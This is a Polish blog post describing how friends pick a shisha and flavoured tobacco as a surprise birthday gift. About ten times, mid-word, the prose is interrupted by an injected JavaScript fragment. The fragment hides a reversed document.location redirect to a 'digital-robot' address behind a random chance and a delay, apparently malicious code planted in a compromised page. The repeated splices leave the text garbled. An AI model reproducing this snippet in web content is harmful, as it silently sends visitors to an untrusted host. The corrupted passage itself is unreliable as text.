Wybór sziszy dla kolegi

W paczce moich znajomych jedno z nas niedługo obchodzi urodziny. Jest tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to osoba, która bardzo lubi dobrą zabawę, zdrową, niezdrową, byle była adrenalina albo coś takiego extra. Postanowiliśmy sprawić mu przyjemność i poszukać czegoś naprawdę pod jego gust.

Wybór sziszy na prezent

szisza sklepDługo zastanawialiśmy się nad tym, co kupić naszemu koledze. Fundusze nas niekoniecznie ograniczały, bo paczka naszych znajomych jest spora, więc jak się zrzucimy wszyscy, tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to można naprawdę coś ciekawego wybrać. Ktobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toś rzucił pomysł, żeby wybrać się wspólnie z okazji tych urodzin na paintballa, ale niestety pogoda, jaką zapowiadają na weekend, kiedy byśmy świętobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towali te urodziny, nie będzie raczej sprzyjać takiej rozrywce. Wypad za miastobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to na ognisko albo grilla też w związku z tym mógłby nie wypalić. Trzeba więc pomyśleć o czymś w pomieszczeniu zamkniętym, gdzie chłód, wiatr i deszcz nie dadzą nam się we znaki. Ktobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toś zaproponował, żeby zrobić naszemu koledze imprezę niespodziankę i kupić mu sziszę. Wszyscy zainteresowali się pomysłem, zwłaszcza, że nasz solenizant lubi chodzić w miejsca, gdzie się przesiaduje właśnie przy sziszy. Przechodząc ulicą widzę – szisza sklep akurat był otwarty, więc weszliśmy. Bardzo ładne zestawy od razu wpadły nam w oko. Wybraliśmy fajkę, która składała się z ceramicznego dzbana. Ozdobiony jest fajnymi orientalnymi elementami, które przyciągają wzrok i uatrakcyjniają wygląd tego sprzętu. Metalowy, zdobiony wąż do zaciągania dymu też jest ładnie ozdobiony, a ustnik jest metalowy, co będzie ułatwiało jego czyszczenie. Dobraliśmy też dwa rodzaje tytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toniu – jabłkowy i bananowy, bo wiemy, że kolega lubi te smaki.

Mam nadzieję, że prezent będzie trafiony, a impreza niespodzianka uda się jak wszystkie nasze spotkania. Musimy tylko kolegę jakoś tak zamotać, żeby, wyciągnięty prostobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to z pracy, nie domyślił się, że jedzie na swoją własną imprezę urodzinową.